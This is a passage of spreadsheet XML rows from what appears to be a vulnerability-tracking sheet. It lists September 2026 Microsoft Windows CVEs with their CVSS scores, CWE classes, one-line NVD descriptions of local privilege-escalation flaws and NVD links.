      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69407</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69420</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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09" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69424</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69432</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69433</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69436</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69444</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69445</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69447</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69450</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69455</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69459</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69467</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K52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23" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
